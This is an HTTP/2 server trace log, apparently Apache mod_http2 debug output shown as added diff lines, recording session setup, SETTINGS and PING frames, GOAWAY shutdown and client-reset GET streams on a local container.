+[Thu Aug 06 15:21:23.408732 2026] [http2:trace2] [pid 549:tid 584] h2_session.c(473): [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): on_frame_rcv PING[length=8, ack=0, stream=0]
+[Thu Aug 06 15:21:23.408734 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(556): [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.408736 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(366): [client 192.168.65.1:16395] h2_c1_io(7): adding 9 data bytes
+[Thu Aug 06 15:21:23.408738 2026] [http2:debug] [pid 549:tid 584] h2_session.c(635): [client 192.168.65.1:16395] AH03068: h2_session(549-3,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=2/3 (r/s)
+[Thu Aug 06 15:21:23.408740 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(366): [client 192.168.65.1:16395] h2_c1_io(7): adding 17 data bytes
+[Thu Aug 06 15:21:23.408742 2026] [http2:debug] [pid 549:tid 584] h2_session.c(635): [client 192.168.65.1:16395] AH03068: h2_session(549-3,BUSY,0): sent FRAME[PING[length=8, ack=1, stream=0]], frames=2/4 (r/s)
+[Thu Aug 06 15:21:23.408743 2026] [http2:trace2] [pid 549:tid 584] h2_session.c(1369): [client 192.168.65.1:16395] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.408745 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(131): [client 192.168.65.1:16395] h2_session(7)-out: heap[26] 
+[Thu Aug 06 15:21:23.408747 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(131): [client 192.168.65.1:16395] h2_session(7)-out: flush 
+[Thu Aug 06 15:21:23.408759 2026] [http2:trace2] [pid 549:tid 584] h2_mplx.c(1206): [client 192.168.65.1:16395] h2_mplx(549-3): enter polling timeout=0
+[Thu Aug 06 15:21:23.408762 2026] [http2:trace2] [pid 549:tid 584] h2_mplx.c(1250): [client 192.168.65.1:16395] h2_mplx(549-3): polling timed out 
+[Thu Aug 06 15:21:23.408766 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(524): [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.408768 2026] [http2:debug] [pid 549:tid 584] h2_session.c(1459): [client 192.168.65.1:16395] AH03078: h2_session(549-3,BUSY,0): transit [BUSY] -- input exhausted, no streams --> [IDLE]
+[Thu Aug 06 15:21:23.408770 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:16395] h2_session(549-3,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.408774 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(524): [client 192.168.65.1:16395] h2_session(549-3,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.408776 2026] [http2:trace2] [pid 549:tid 584] h2_c1_io.c(556): (11)Resource temporarily unavailable: [client 192.168.65.1:16395] h2_session(549-3,IDLE,0): session_read done
+[Thu Aug 06 15:21:23.408778 2026] [http2:debug] [pid 549:tid 584] h2_session.c(1971): [client 192.168.65.1:16395] AH10306: h2_session(549-3,IDLE,0): returning to mpm c1 monitoring
+[Thu Aug 06 15:21:23.408938 2026] [http2:trace1] [pid 549:tid 585] h2_c1.c(246): [client 192.168.65.1:16395] h2_h2, process_conn
+[Thu Aug 06 15:21:23.408946 2026] [http2:trace1] [pid 549:tid 585] h2_c1.c(297): [client 192.168.65.1:16395] process_conn
+[Thu Aug 06 15:21:23.408948 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(524): [client 192.168.65.1:16395] h2_session(549-3,IDLE,0): session_read start
+[Thu Aug 06 15:21:23.408956 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(506): [client 192.168.65.1:16395] bb_dump(8): c1 in(HEAP[9])
+[Thu Aug 06 15:21:23.408960 2026] [http2:debug] [pid 549:tid 585] h2_session.c(383): [client 192.168.65.1:16395] AH03066: h2_session(549-3,IDLE,0): recv FRAME[SETTINGS[ack=1, stream=0]], frames=2/4 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.408962 2026] [http2:trace2] [pid 549:tid 585] h2_session.c(464): [client 192.168.65.1:16395] h2_session(549-3,IDLE,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.408964 2026] [http2:trace2] [pid 549:tid 585] h2_session.c(489): [client 192.168.65.1:16395] h2_session(549-3,IDLE,0): session has 1 idle frames
+[Thu Aug 06 15:21:23.408966 2026] [http2:debug] [pid 549:tid 585] h2_session.c(1459): [client 192.168.65.1:16395] AH03078: h2_session(549-3,IDLE,0): transit [IDLE] -- input read --> [BUSY]
+[Thu Aug 06 15:21:23.408967 2026] [http2:trace1] [pid 549:tid 585] h2_session.c(1474): [client 192.168.65.1:16395] h2_session(549-3,IDLE,0): enter idle
+[Thu Aug 06 15:21:23.408969 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(556): [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.408970 2026] [http2:trace2] [pid 549:tid 585] h2_mplx.c(1206): [client 192.168.65.1:16395] h2_mplx(549-3): enter polling timeout=0
+[Thu Aug 06 15:21:23.408973 2026] [http2:trace2] [pid 549:tid 585] h2_session.c(1406): [client 192.168.65.1:16395] h2_stream(549-3-0,IDLE): on_input change
+[Thu Aug 06 15:21:23.408975 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(524): [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.408977 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:16395] h2_session(549-3,BUSY,0): input gone
+[Thu Aug 06 15:21:23.408978 2026] [http2:debug] [pid 549:tid 585] h2_session.c(1569): [client 192.168.65.1:16395] AH03401: h2_session(549-3,BUSY,0): conn error -> shutdown, remote.emitted=0
+[Thu Aug 06 15:21:23.408981 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(366): [client 192.168.65.1:16395] h2_c1_io(8): adding 17 data bytes
+[Thu Aug 06 15:21:23.408983 2026] [http2:debug] [pid 549:tid 585] h2_session.c(635): [client 192.168.65.1:16395] AH03068: h2_session(549-3,BUSY,0): sent FRAME[GOAWAY[error=0, reason='', last_stream=0]], frames=3/5 (r/s)
+[Thu Aug 06 15:21:23.408988 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(131): [client 192.168.65.1:16395] h2_session(8)-out: heap[17] flush 
+[Thu Aug 06 15:21:23.409009 2026] [http2:debug] [pid 549:tid 585] h2_session.c(848): [client 192.168.65.1:16395] AH03069: h2_session(549-3,BUSY,0): sent GOAWAY, err=0, msg=
+[Thu Aug 06 15:21:23.409016 2026] [http2:debug] [pid 549:tid 585] h2_session.c(1459): [client 192.168.65.1:16395] AH03078: h2_session(549-3,BUSY,0): transit [BUSY] -- local goaway --> [DONE]
+[Thu Aug 06 15:21:23.409018 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:16395] h2_session(549-3,DONE,0): session_read done
+[Thu Aug 06 15:21:23.409019 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(524): [client 192.168.65.1:16395] h2_session(549-3,DONE,0): session_read start
+[Thu Aug 06 15:21:23.409021 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(543): (70014)End of file found: [client 192.168.65.1:16395] h2_session(549-3,DONE,0): input gone
+[Thu Aug 06 15:21:23.409022 2026] [http2:trace2] [pid 549:tid 585] h2_c1_io.c(556): (70014)End of file found: [client 192.168.65.1:16395] h2_session(549-3,DONE,0): session_read done
+[Thu Aug 06 15:21:23.409024 2026] [http2:debug] [pid 549:tid 585] h2_c1.c(134): (70014)End of file found: [client 192.168.65.1:16395] AH03045: h2_session(549-3,DONE,0): process, closing conn
+[Thu Aug 06 15:21:23.409028 2026] [http2:trace1] [pid 549:tid 585] h2_session.c(2133): [client 192.168.65.1:16395] h2_session(549-3,DONE,0): pre_close
+[Thu Aug 06 15:21:23.409031 2026] [http2:trace1] [pid 549:tid 585] h2_session.c(859): [client 192.168.65.1:16395] h2_session(549-3,DONE,0): pool_cleanup
+[Thu Aug 06 15:21:23.409033 2026] [http2:debug] [pid 549:tid 585] h2_session.c(1459): [client 192.168.65.1:16395] AH03078: h2_session(549-3,DONE,0): transit [DONE] -- pre_close --> [CLEANUP]
+[Thu Aug 06 15:21:23.409034 2026] [http2:trace2] [pid 549:tid 585] h2_mplx.c(502): [client 192.168.65.1:16395] h2_mplx(549-3): start release
+[Thu Aug 06 15:21:23.409036 2026] [http2:trace1] [pid 549:tid 585] h2_mplx.c(518): [client 192.168.65.1:16395] h2_mplx(549-3): release, 0/0/0 streams (total/hold/purge), 0 streams
+[Thu Aug 06 15:21:23.409038 2026] [http2:trace1] [pid 549:tid 585] h2_mplx.c(570): [client 192.168.65.1:16395] h2_mplx(549-3): released
+[Thu Aug 06 15:21:23.409429 2026] [http2:trace1] [pid 549:tid 586] h2_c1.c(246): [client 192.168.65.1:32828] h2_h2, process_conn
+[Thu Aug 06 15:21:23.409446 2026] [http2:trace1] [pid 549:tid 586] h2_c1.c(251): [client 192.168.65.1:32828] h2_h2, process_conn, new connection using protocol 'http/1.1', direct=1, tls acceptable=1
+[Thu Aug 06 15:21:23.409453 2026] [http2:trace1] [pid 549:tid 586] h2_c1.c(281): [client 192.168.65.1:32828] h2_h2, direct mode detected
+[Thu Aug 06 15:21:23.409456 2026] [http2:trace1] [pid 549:tid 586] h2_c1.c(297): [client 192.168.65.1:32828] process_conn
+[Thu Aug 06 15:21:23.409458 2026] [http2:debug] [pid 549:tid 586] h2_stream.c(609): [client 192.168.65.1:32828] AH03082: h2_stream(549-4-0,IDLE): created
+[Thu Aug 06 15:21:23.409494 2026] [http2:debug] [pid 549:tid 586] h2_session.c(1070): [client 192.168.65.1:32828] AH03200: h2_session(549-4,INIT,0): created, max_streams=100, stream_mem=32768, workers_limit=6, workers_max=37, push_diary(type=1,N=256), max_data_frame_len=0, max_stream_errors=8
+[Thu Aug 06 15:21:23.409497 2026] [http2:trace1] [pid 549:tid 586] h2_c1.c(300): [client 192.168.65.1:32828] conn_setup
+[Thu Aug 06 15:21:23.409501 2026] [http2:debug] [pid 549:tid 586] h2_session.c(1170): [client 192.168.65.1:32828] AH03201: h2_session(549-4,INIT,0): start, INITIAL_WINDOW_SIZE=65535, MAX_CONCURRENT_STREAMS=100
+[Thu Aug 06 15:21:23.409504 2026] [http2:debug] [pid 549:tid 586] h2_session.c(1876): [client 192.168.65.1:32828] AH03079: h2_session(549-4,INIT,0): started on 172.17.0.4:80
+[Thu Aug 06 15:21:23.409506 2026] [http2:debug] [pid 549:tid 586] h2_session.c(1459): [client 192.168.65.1:32828] AH03078: h2_session(549-4,INIT,0): transit [INIT] -- init --> [BUSY]
+[Thu Aug 06 15:21:23.409508 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(366): [client 192.168.65.1:32828] h2_c1_io(9): adding 15 data bytes
+[Thu Aug 06 15:21:23.409510 2026] [http2:debug] [pid 549:tid 586] h2_session.c(635): [client 192.168.65.1:32828] AH03068: h2_session(549-4,BUSY,0): sent FRAME[SETTINGS[length=6, stream=0]], frames=0/1 (r/s)
+[Thu Aug 06 15:21:23.409516 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(366): [client 192.168.65.1:32828] h2_c1_io(9): adding 13 data bytes
+[Thu Aug 06 15:21:23.409517 2026] [http2:debug] [pid 549:tid 586] h2_session.c(635): [client 192.168.65.1:32828] AH03068: h2_session(549-4,BUSY,0): sent FRAME[WINDOW_UPDATE[stream=0, incr=2147418112]], frames=0/2 (r/s)
+[Thu Aug 06 15:21:23.409519 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1369): [client 192.168.65.1:32828] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.409524 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(131): [client 192.168.65.1:32828] h2_session(9)-out: heap[28] 
+[Thu Aug 06 15:21:23.409528 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(131): [client 192.168.65.1:32828] h2_session(9)-out: flush 
+[Thu Aug 06 15:21:23.409550 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(1206): [client 192.168.65.1:32828] h2_mplx(549-4): enter polling timeout=0
+[Thu Aug 06 15:21:23.409553 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(1250): [client 192.168.65.1:32828] h2_mplx(549-4): polling timed out 
+[Thu Aug 06 15:21:23.409554 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(524): [client 192.168.65.1:32828] h2_session(549-4,BUSY,0): session_read start
+[Thu Aug 06 15:21:23.409558 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(506): [client 192.168.65.1:32828] bb_dump(9): c1 in(HEAP[24] HEAP[93])
+[Thu Aug 06 15:21:23.409562 2026] [http2:debug] [pid 549:tid 586] h2_session.c(383): [client 192.168.65.1:32828] AH03066: h2_session(549-4,BUSY,0): recv FRAME[SETTINGS[length=0, stream=0]], frames=0/2 (r/s), remote.emitted=0
+[Thu Aug 06 15:21:23.409564 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(464): [client 192.168.65.1:32828] h2_session(549-4,BUSY,0): SETTINGS, len=0
+[Thu Aug 06 15:21:23.409572 2026] [http2:debug] [pid 549:tid 586] h2_stream.c(609): [client 192.168.65.1:32828] AH03082: h2_stream(549-4-1,IDLE): created
+[Thu Aug 06 15:21:23.409574 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-1,IDLE): entered state
+[Thu Aug 06 15:21:23.409585 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-1,IDLE): add_header: ':method: GET
+[Thu Aug 06 15:21:23.409588 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-1,IDLE): add_header: ':scheme: http
+[Thu Aug 06 15:21:23.409593 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-1,IDLE): add_header: ':path: /
+[Thu Aug 06 15:21:23.409596 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-1,IDLE): add_header: ':authority: 127.0.0.1:18082
+[Thu Aug 06 15:21:23.409599 2026] [http2:debug] [pid 549:tid 586] h2_session.c(376): [client 192.168.65.1:32828] AH10302: h2_stream(549-4-1,IDLE): recv FRAME[HEADERS[length=20, hend=1, stream=1, eos=1]], frames=1/2 (r/s)
+[Thu Aug 06 15:21:23.409604 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-1,IDLE): transit to [OPEN]
+[Thu Aug 06 15:21:23.409606 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-1,OPEN): entered state
+[Thu Aug 06 15:21:23.409609 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-1,OPEN): transit to [HALF_CLOSED_REMOTE]
+[Thu Aug 06 15:21:23.409610 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(276): [client 192.168.65.1:32828] h2_stream(549-4-1,HALF_CLOSED_REMOTE): closing input
+[Thu Aug 06 15:21:23.409612 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-1,HALF_CLOSED_REMOTE): entered state
+[Thu Aug 06 15:21:23.409614 2026] [http2:debug] [pid 549:tid 586] h2_session.c(376): [client 192.168.65.1:32828] AH10302: h2_stream(549-4-1,HALF_CLOSED_REMOTE): recv FRAME[RST_STREAM[length=4, flags=0, stream=1,error=8]], frames=2/2 (r/s)
+[Thu Aug 06 15:21:23.409618 2026] [http2:debug] [pid 549:tid 586] h2_session.c(430): [client 192.168.65.1:32828] AH03067: h2_stream(549-4-1): RST_STREAM by client, error=8
+[Thu Aug 06 15:21:23.409620 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-1,HALF_CLOSED_REMOTE): transit to [CLOSED]
+[Thu Aug 06 15:21:23.409622 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): entered state
+[Thu Aug 06 15:21:23.409624 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1702): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): adding h2_eos to c1 out
+[Thu Aug 06 15:21:23.409626 2026] [http2:debug] [pid 549:tid 586] h2_mplx.c(1169): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): very early RST, drop
+[Thu Aug 06 15:21:23.409628 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(645): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): reset, error=5
+[Thu Aug 06 15:21:23.409629 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): dispatch event 2
+[Thu Aug 06 15:21:23.409631 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): non-state event 2
+[Thu Aug 06 15:21:23.409633 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): dispatch event 3
+[Thu Aug 06 15:21:23.409634 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-1,CLOSED): transit to [CLEANUP]
+[Thu Aug 06 15:21:23.409636 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(141): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:21:23.409638 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(155): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:21:23.409640 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(181): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:21:23.409642 2026] [http2:debug] [pid 549:tid 586] h2_session.c(290): [client 192.168.65.1:32828] AH03065: h2_stream(549-4-1,CLEANUP): closing with err=8 cancel
+[Thu Aug 06 15:21:23.409644 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(645): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): reset, error=8
+[Thu Aug 06 15:21:23.409645 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): dispatch event 2
+[Thu Aug 06 15:21:23.409647 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): non-state event 2
+[Thu Aug 06 15:21:23.409648 2026] [http2:debug] [pid 549:tid 586] h2_mplx.c(1169): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): very early RST, drop
+[Thu Aug 06 15:21:23.409683 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(645): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): reset, error=5
+[Thu Aug 06 15:21:23.409687 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): dispatch event 2
+[Thu Aug 06 15:21:23.409689 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): non-state event 2
+[Thu Aug 06 15:21:23.409691 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): dispatch event 3
+[Thu Aug 06 15:21:23.409692 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): non-state event 3
+[Thu Aug 06 15:21:23.409694 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(141): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:21:23.409695 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(155): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:21:23.409700 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(181): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:21:23.409714 2026] [http2:debug] [pid 549:tid 586] h2_stream.c(609): [client 192.168.65.1:32828] AH03082: h2_stream(549-4-3,IDLE): created
+[Thu Aug 06 15:21:23.409717 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-3,IDLE): entered state
+[Thu Aug 06 15:21:23.409720 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-3,IDLE): add_header: ':method: GET
+[Thu Aug 06 15:21:23.409722 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-3,IDLE): add_header: ':scheme: http
+[Thu Aug 06 15:21:23.409724 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-3,IDLE): add_header: ':path: /
+[Thu Aug 06 15:21:23.409727 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(790): [client 192.168.65.1:32828] h2_stream(549-4-3,IDLE): add_header: ':authority: 127.0.0.1:18082
+[Thu Aug 06 15:21:23.409729 2026] [http2:debug] [pid 549:tid 586] h2_session.c(376): [client 192.168.65.1:32828] AH10302: h2_stream(549-4-3,IDLE): recv FRAME[HEADERS[length=20, hend=1, stream=3, eos=1]], frames=3/2 (r/s)
+[Thu Aug 06 15:21:23.409732 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-3,IDLE): transit to [OPEN]
+[Thu Aug 06 15:21:23.409734 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-3,OPEN): entered state
+[Thu Aug 06 15:21:23.409736 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-3,OPEN): transit to [HALF_CLOSED_REMOTE]
+[Thu Aug 06 15:21:23.409738 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(276): [client 192.168.65.1:32828] h2_stream(549-4-3,HALF_CLOSED_REMOTE): closing input
+[Thu Aug 06 15:21:23.409740 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-3,HALF_CLOSED_REMOTE): entered state
+[Thu Aug 06 15:21:23.409742 2026] [http2:debug] [pid 549:tid 586] h2_session.c(376): [client 192.168.65.1:32828] AH10302: h2_stream(549-4-3,HALF_CLOSED_REMOTE): recv FRAME[RST_STREAM[length=4, flags=0, stream=3,error=8]], frames=4/2 (r/s)
+[Thu Aug 06 15:21:23.409744 2026] [http2:debug] [pid 549:tid 586] h2_session.c(430): [client 192.168.65.1:32828] AH03067: h2_stream(549-4-3): RST_STREAM by client, error=8
+[Thu Aug 06 15:21:23.409745 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-3,HALF_CLOSED_REMOTE): transit to [CLOSED]
+[Thu Aug 06 15:21:23.409747 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1714): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): entered state
+[Thu Aug 06 15:21:23.409749 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1702): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): adding h2_eos to c1 out
+[Thu Aug 06 15:21:23.409751 2026] [http2:debug] [pid 549:tid 586] h2_mplx.c(1169): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): very early RST, drop
+[Thu Aug 06 15:21:23.409752 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(645): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): reset, error=5
+[Thu Aug 06 15:21:23.409754 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): dispatch event 2
+[Thu Aug 06 15:21:23.409755 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): non-state event 2
+[Thu Aug 06 15:21:23.409757 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): dispatch event 3
+[Thu Aug 06 15:21:23.409759 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(356): [client 192.168.65.1:32828] h2_stream(549-4-3,CLOSED): transit to [CLEANUP]
+[Thu Aug 06 15:21:23.409760 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(141): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:21:23.409764 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(155): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:21:23.409766 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(181): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:21:23.409768 2026] [http2:debug] [pid 549:tid 586] h2_session.c(290): [client 192.168.65.1:32828] AH03065: h2_stream(549-4-3,CLEANUP): closing with err=8 cancel
+[Thu Aug 06 15:21:23.409769 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(645): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): reset, error=8
+[Thu Aug 06 15:21:23.409771 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): dispatch event 2
+[Thu Aug 06 15:21:23.409772 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): non-state event 2
+[Thu Aug 06 15:21:23.409774 2026] [http2:debug] [pid 549:tid 586] h2_mplx.c(1169): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): very early RST, drop
+[Thu Aug 06 15:21:23.409776 2026] [http2:trace1] [pid 549:tid 586] h2_stream.c(645): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): reset, error=5
+[Thu Aug 06 15:21:23.409777 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): dispatch event 2
+[Thu Aug 06 15:21:23.409779 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): non-state event 2
+[Thu Aug 06 15:21:23.409780 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): dispatch event 3
+[Thu Aug 06 15:21:23.409782 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(409): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): non-state event 3
+[Thu Aug 06 15:21:23.409783 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(141): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): cleanup, unsubscribing from beam events
+[Thu Aug 06 15:21:23.409785 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(155): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): cleanup, removing from registries
+[Thu Aug 06 15:21:23.409786 2026] [http2:trace2] [pid 549:tid 586] h2_mplx.c(181): [client 192.168.65.1:32828] h2_stream(549-4-3,CLEANUP): cleanup, never started, move to spurge
+[Thu Aug 06 15:21:23.409789 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(556): [client 192.168.65.1:32828] h2_session(549-4,BUSY,0): session_read done
+[Thu Aug 06 15:21:23.409792 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(366): [client 192.168.65.1:32828] h2_c1_io(9): adding 9 data bytes
+[Thu Aug 06 15:21:23.409795 2026] [http2:debug] [pid 549:tid 586] h2_session.c(635): [client 192.168.65.1:32828] AH03068: h2_session(549-4,BUSY,0): sent FRAME[SETTINGS[ack=1, stream=0]], frames=5/3 (r/s)
+[Thu Aug 06 15:21:23.409797 2026] [http2:trace2] [pid 549:tid 586] h2_session.c(1369): [client 192.168.65.1:32828] nghttp2_session_send: 0
+[Thu Aug 06 15:21:23.409799 2026] [http2:trace2] [pid 549:tid 586] h2_c1_io.c(131): [client 192.168.65.1:32828] h2_session(9)-out: h2eos h2eos heap[9] 
+[Thu Aug 06 15:21:23.409802 2026] [http2:trace2] [pid 549:tid 586] h2_stream.c(397): [client 192.168.65.1:32828] h2_stream(549-4-1,CLEANUP): dispatch event 3
